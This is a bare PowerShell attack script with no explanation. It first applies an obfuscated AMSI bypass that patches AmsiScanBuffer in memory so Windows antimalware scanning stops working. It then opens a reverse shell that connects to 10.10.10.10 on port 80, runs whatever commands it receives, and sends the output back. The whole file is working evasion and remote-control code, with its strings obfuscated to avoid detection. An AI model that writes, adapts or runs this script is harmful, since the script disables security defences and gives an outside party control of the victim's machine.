code.txt

#Rasta-mouses Amsi-Scan-Buffer patch \n
$goehf = @"
using System;
using System.Runtime.InteropServices;
public class goehf {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr mryhhp, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $goehf

$gaajlkg = [goehf]::LoadLibrary("$(('ämsí'+'.dll').NoRmAlIZE([ChaR]([Byte]0x46)+[chAr]([byTe]0x6f)+[CHAR]([bYTE]0x72)+[CHar](109*8/8)+[CHAr]([bYTE]0x44)) -replace [chAR]([BYtE]0x5c)+[char](75+37)+[ChAR]([ByTe]0x7b)+[CHAr](77+32-32)+[CHaR](110*52/52)+[ChAR](61+64))")
$rppdxp = [goehf]::GetProcAddress($gaajlkg, "$([CHar](65*36/36)+[CHar]([bytE]0x6d)+[ChAR](115+68-68)+[CHAR]([bYte]0x69)+[chaR]([BYTe]0x53)+[CHAr]([byTE]0x63)+[CHar]([BYte]0x61)+[Char]([bytE]0x6e)+[CHAR](66)+[ChAr](117*88/88)+[chAr]([bYTE]0x66)+[ChaR](102+6-6)+[Char](101+99-99)+[cHAr](57+57))")
$p = 0
[goehf]::VirtualProtect($rppdxp, [uint32]5, 0x40, [ref]$p)
$xxwq = "0xB8"
$vcxd = "0x57"
$myer = "0x00"
$giik = "0x07"
$lred = "0x80"
$urdz = "0xC3"
$ezvwn = [Byte[]] ($xxwq,$vcxd,$myer,$giik,+$lred,+$urdz)
[System.Runtime.InteropServices.Marshal]::Copy($ezvwn, 0, $rppdxp, 6)

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()